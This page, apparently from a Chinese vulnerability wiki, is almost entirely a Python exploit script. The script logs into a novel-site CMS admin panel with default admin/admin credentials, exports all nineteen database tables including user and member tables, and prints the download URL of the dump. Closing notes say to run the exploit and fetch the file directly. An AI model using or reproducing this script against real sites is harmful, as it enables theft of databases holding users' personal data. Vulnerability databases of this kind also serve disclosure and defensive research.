免费、自由、人人可编辑的漏洞库
,
EXP
# !/usr/bin/python3
# -*- coding:utf-8 -*-
# author: Forthrglory
import requests
import time
def getDatabase(url,username, password):
session = requests.session()
u = 'http://%s/admin/index/login.html' % (url)
head = {
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
}
data = {
'username': username,
'password': password,
'code': 1
}
session.post(u, data, headers = head)
u = 'http://%s/admin/database/export.html' % (url)
data = {
'layTableCheckbox':'on',
'tables0':'ky_ad',
'tables1':'ky_addons',
'tables2':'ky_bookshelf',
'tables3':'ky_category',
'tables4':'ky_collect',
'tables5':'ky_comment',
'tables6':'ky_config',
'tables7':'ky_crontab',
'tables8':'ky_link',
'tables9':'ky_member',
'tables10':'ky_menu',
'tables11':'ky_news',
'tables12':'ky_novel',
'tables13':'ky_novel_chapter',
'tables14':'ky_route',
'tables15':'ky_slider',
'tables16':'ky_template',
'tables17':'ky_user',
'tables18':'ky_user_menu'
}
t = time.strftime("%Y%m%d-%H%M%S", time.localtime())
session.post(u, data = data)
for i in range(0, 19):
u2 = 'http://%s/admin/database/export.html?id=%s&start=0' % (url, str(i))
session.get(u2)
t = 'http://' + url + '/public/database/' + t + '-1.sql.gz'
return t
if __name__ == '__main__':
u = '127.0.0.1'
username = 'admin'
password = 'admin'
t = getDatabase(u, username, password)
print(t)
运行EXP,得到路径(默认生成路径为/public/database/,可在设置中修改)
直接访问即可下载文件。
PWNWIK.COM
